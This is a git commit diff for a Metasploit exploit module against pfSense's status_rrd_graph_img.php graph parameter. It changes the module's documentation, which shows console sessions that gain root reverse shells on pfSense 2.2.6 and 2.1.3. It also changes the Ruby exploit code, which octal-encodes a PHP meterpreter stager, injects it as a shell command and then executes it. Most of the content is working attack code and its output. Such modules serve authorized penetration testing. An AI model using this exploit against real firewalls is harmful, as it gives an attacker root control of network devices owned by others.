requested changes

MS-2855/keylogger-mettle-extension
wetw0rk 2018-01-01 17:30:43 -06:00
parent bc088cb379
commit 8f0e41e159
2 changed files with 35 additions and 100 deletions

View File

@ -27,44 +27,22 @@
### pfSense Community Edition 2.2.6-RELEASE ### pfSense Community Edition 2.2.6-RELEASE
``` ```
msf exploit(unix/http/pfsense_graph_injection_exec) > options msf exploit(unix/http/pfsense_graph_injection_exec) > use exploit/unix/http/pfsense_graph_injection_execmsf exploit(unix/http/pfsense_graph_injection_exec) > set RHOST 2.2.2.2
RHOST => 2.2.2.2
msf exploit(unix/http/pfsense_graph_injection_exec) > set LHOST 1.1.1.1
LHOST => 1.1.1.1
msf exploit(unix/http/pfsense_graph_injection_exec) > exploit
Module options (exploit/unix/http/pfsense_graph_injection_exec): [*] Started reverse TCP handler on 1.1.1.1:4444
Name Current Setting Required Description
---- --------------- -------- -----------
PASSWORD pfsense yes Password to login with
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOST 192.168.75.132 yes The target address
RPORT 443 yes The target port (TCP)
SSL true no Negotiate SSL/TLS for outgoing connections
USERNAME admin yes User to login with
VHOST no HTTP server virtual host
Payload options (php/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.75.128 yes The listen address
LPORT 80 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic Target
msf exploit(unix/http/pfsense_graph_injection_exec) > exploit
[*] Started reverse TCP handler on 192.168.75.128:80
[*] Detected pfSense 2.2.6-RELEASE, uploading intial payload [*] Detected pfSense 2.2.6-RELEASE, uploading intial payload
[*] Triggering the payload, root shell incoming... [*] Payload uploaded successfully, executing
[*] Sending stage (37543 bytes) to 192.168.75.132 [*] Sending stage (37543 bytes) to 2.2.2.2
[*] Meterpreter session 1 opened (192.168.75.128:80 -> 192.168.75.132:34381) at 2018-01-01 02:07:03 -0600 [*] Meterpreter session 1 opened (1.1.1.1:4444 -> 2.2.2.2:42116) at 2018-01-01 17:17:36 -0600
meterpreter > sysinfo
Computer : pfSense.localdomain
OS : FreeBSD pfSense.localdomain 10.1-RELEASE-p25 FreeBSD 10.1-RELEASE-p25 #0 c39b63e(releng/10.1)-dirty: Mon Dec 21 15:20:13 CST 2015 root@pfs22-amd64-builder:/usr/obj.RELENG_2_2.amd64/usr/pfSensesrc/src.RELENG_2_2/sys/pfSense_SMP.10 amd64
Meterpreter : php/freebsd
meterpreter > getuid meterpreter > getuid
Server username: root (0) Server username: root (0)
meterpreter > meterpreter >
@ -73,45 +51,20 @@ meterpreter >
### pfSense Community Edition 2.1.3-RELEASE ### pfSense Community Edition 2.1.3-RELEASE
``` ```
msf exploit(unix/http/pfsense_graph_injection_exec) > options msf > use exploit/unix/http/pfsense_graph_injection_exec
msf exploit(unix/http/pfsense_graph_injection_exec) > set RHOST 2.2.2.2
Module options (exploit/unix/http/pfsense_graph_injection_exec): RHOST => 2.2.2.2
msf exploit(unix/http/pfsense_graph_injection_exec) > set LHOST 1.1.1.1
Name Current Setting Required Description LHOST => 1.1.1.1
---- --------------- -------- ----------- msf exploit(unix/http/pfsense_graph_injection_exec) > set PAYLOAD php/reverse_php
PASSWORD pfsense yes Password to login with PAYLOAD => php/reverse_php
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOST 192.168.75.131 yes The target address
RPORT 443 yes The target port (TCP)
SSL true no Negotiate SSL/TLS for outgoing connections
USERNAME admin yes User to login with
VHOST no HTTP server virtual host
Payload options (php/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.75.128 yes The listen address
LPORT 80 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic Target
msf exploit(unix/http/pfsense_graph_injection_exec) > exploit msf exploit(unix/http/pfsense_graph_injection_exec) > exploit
[*] Started reverse TCP handler on 192.168.75.128:80 [*] Started reverse TCP handler on 1.1.1.1:4444
[*] Detected pfSense 2.1.3-RELEASE, uploading intial payload [*] Detected pfSense 2.1.3-RELEASE, uploading intial payload
[*] Triggering the payload, root shell incoming... [*] Payload uploaded successfully, executing
[*] Sending stage (37543 bytes) to 192.168.75.131 [*] Command shell session 1 opened (1.1.1.1:4444 -> 2.2.2.2:3454) at 2018-01-01 15:49:38 -0600
[*] Meterpreter session 1 opened (192.168.75.128:80 -> 192.168.75.131:45257) at 2018-01-01 01:03:05 -0600 uname -a
meterpreter > getuid FreeBSD pfSense.localdomain 8.3-RELEASE-p16 FreeBSD 8.3-RELEASE-p16 #0: Thu May 1 16:19:14 EDT 2014 root@pf2_1_1_amd64.pfsense.org:/usr/obj.amd64/usr/pfSensesrc/src/sys/pfSense_SMP.8 amd64
Server username: root (0)
meterpreter >
``` ```

View File

@ -40,7 +40,6 @@ class MetasploitModule < Msf::Exploit::Remote
'Encoder' => 'php/base64', 'Encoder' => 'php/base64',
'PAYLOAD' => 'php/meterpreter/reverse_tcp', 'PAYLOAD' => 'php/meterpreter/reverse_tcp',
}, },
'DisclosureDate' => 'Apr 18, 2016', 'DisclosureDate' => 'Apr 18, 2016',
'Platform' => 'php', 'Platform' => 'php',
'Arch' => ARCH_PHP, 'Arch' => ARCH_PHP,
@ -108,7 +107,7 @@ class MetasploitModule < Msf::Exploit::Remote
end end
# If the device isn't fully setup, you get stuck at redirects to wizard.php # If the device isn't fully setup, you get stuck at redirects to wizard.php
# however, this does NOT stop exploitation strangely # however, this does NOT stop exploitation strangely
print_error("pfSense version not detected or wizard still enabled.") print_error('pfSense version not detected or wizard still enabled.')
Gem::Version.new('0.0') Gem::Version.new('0.0')
end end
@ -116,10 +115,10 @@ class MetasploitModule < Msf::Exploit::Remote
begin begin
cookie = login cookie = login
version = detect_version(cookie) version = detect_version(cookie)
filename = rand_text_alpha(rand(20)) filename = rand_text_alpha(rand(10))
# generate the PHP meterpreter payload # generate the PHP meterpreter payload
stager = "echo \'<?php " stager = 'echo \'<?php '
stager << payload.encode stager << payload.encode
stager << "?>\' > #{filename}" stager << "?>\' > #{filename}"
# here we begin the encoding process to # here we begin the encoding process to
@ -127,25 +126,16 @@ class MetasploitModule < Msf::Exploit::Remote
# don't look # don't look
complete_stage = "" complete_stage = ""
for i in 0..(stager.length()-1) for i in 0..(stager.length()-1)
if "#{version}" =~ /2.2/ if version.to_s =~ /2.2/
complete_stage << "\\\\#{stager[i].ord.to_s(8)}" complete_stage << '\\'
else
complete_stage << "\\#{stager[i].ord.to_s(8)}"
end end
complete_stage << "\\#{stager[i].ord.to_s(8)}"
end end
res = send_request_cgi( res = send_request_cgi(
'uri' => '/status_rrd_graph_img.php', 'uri' => '/status_rrd_graph_img.php',
'method' => 'GET', 'method' => 'GET',
'headers' => { 'cookie' => cookie,
'User-Agent' => 'Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0',
'Accept' => '*/*',
'Accept-Language' => 'en-US,en;q=0.5',
'Accept-Encoding' => 'gzip, deflate',
'Origin' => 'null',
'Cookie' => cookie,
'Connection' => 'close',
},
'vars_get' => { 'vars_get' => {
'database' => '-throughput.rrd', 'database' => '-throughput.rrd',
'graph' => "file|printf '#{complete_stage}'|sh|echo", 'graph' => "file|printf '#{complete_stage}'|sh|echo",
@ -153,23 +143,15 @@ class MetasploitModule < Msf::Exploit::Remote
) )
if res && res.code == 200 if res && res.code == 200
print_status("Triggering the payload, root shell incoming...") print_status('Payload uploaded successfully, executing')
else else
print_error("Failed to upload the initial payload...") print_error('Failed to upload payload...')
end end
res = send_request_cgi({ res = send_request_cgi({
'uri' => '/status_rrd_graph_img.php', 'uri' => '/status_rrd_graph_img.php',
'method' => 'GET', 'method' => 'GET',
'headers' => { 'cookie' => cookie,
'User-Agent' => 'Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0',
'Accept' => 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'Accept-Language' => 'en-US,en;q=0.5',
'Accept-Encoding' => 'gzip, deflate',
'Cookie' => cookie,
'Connection' => 'close',
'Upgrade-Insecure-Requests' => '1',
},
'vars_get' => { 'vars_get' => {
'database' => '-throughput.rrd', 'database' => '-throughput.rrd',
'graph' => "file|php #{filename}|echo " 'graph' => "file|php #{filename}|echo "